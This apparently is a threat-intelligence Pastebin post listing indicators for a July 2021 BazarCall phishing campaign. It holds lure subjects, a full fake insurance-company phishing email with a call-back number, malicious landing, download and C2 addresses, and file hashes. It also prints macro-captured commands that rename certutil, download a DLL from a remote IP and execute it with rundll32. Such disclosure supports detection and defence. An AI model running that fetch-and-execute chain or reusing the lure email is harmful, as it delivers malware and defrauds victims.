ExecuteMalware

2021-07-27 BazarCall IOCs

Jul 27th, 2021
15,837
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. THREAT IDENTIFICATION: BAZARCALL
  2.  
  3. SUBJECTS OBSERVED
  4. Notification email of an abandoned road accident site! Need to to get in touch with a manager!
  5. Notification letter of an abandoned highway accident site! Should to get hold of a supervisor!
  6. Notification letter of an abandoned highway accident site! Must to get hold of a supervisor!
  7.  
  8. SENDERS OBSERVED
  9.  
  10. LURE PHONE NUMBER
  11. 1 313 217 5223
  12.  
  13. EMAIL BODY
  14. Milbank LLP Insurance company
  15.  
  16. Re: Accident on 07/12/2021
  17.  
  18. Case Number: L0XXXXXXXXX
  19.  
  20. Dear <First> <Last>,
  21.  
  22. This mail is to notify you that the vehicle that is documented on your name has left the location of the accident on 07/12/2021.
  23.  
  24. In case you would like to see the complete information about the car that has been related to the car accident and images and video material confirming the incident, please remember to get in touch with us from 9 am thru 6 pm ET at:1 313 217 5223. Our agents will give you all the details you may need.
  25.  
  26. You must get in touch with us immediately or we will have to submit a report regarding an incident to authorities.
  27.  
  28. Regards,
  29. Milbank LLP Insurance company
  30.  
  31. MALDOC LANDING PAGES
  32. https://milbankllp.net/
  33. https://milbankllp.net/order
  34. https://milbankllp.net/case
  35.  
  36. MALDOC DOWNLOAD URL
  37. https://milbankllp.net/download.php
  38.  
  39. BAZARCALL MALDOC FILE HASHES
  40. case_L0XXXXXXXXX.xlsb
  41. 535f0ae54da4ce0b5b9aedae9a3efa85
  42.  
  43. case_L0XXXXXXXXX.xlsb
  44. 39757aa22acd02291e185ce4c087dad0
  45.  
  46. CAPTURED COMMANDS FROM MACROS:
  47. cmd.exe [580]
  48. "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\DYdPAHU && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\DYdPAHU\DYdPAHU.exe
  49.  
  50. cmd.exe [1852]
  51. "C:\Windows\System32\cmd.exe" /c c:\programdata\DYdPAHU\DYdPAHU.exe -urlcache -f -split http://37.10.71.16 c:\programdata\DYdPAHU\DYdPAHU.dll
  52.  
  53. cmd.exe [1540]
  54. "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\DYdPAHU\DYdPAHU.dll,GlobalOut
  55.  
  56. BAZAR PAYLOAD DOWNLOAD URL
  57. http://37.10.71.16
  58.  
  59. BAZAR PAYLOAD FILE HASHES
  60. (This is certutil just renamed)
  61. DYdPAHU.exe
  62. 0d52559aef4aa5eac82f530617032283
  63.  
  64. DYdPAHU.dll
  65. 1b5565aabbcc5a2218d05c816009c7a4
  66.  
  67. BAZAR C2
  68. https://13.52.241.196/req/proc
  69. https://195.123.233.106/req/proc
  70.  
Advertisement
Add Comment
Please, Sign In to add comment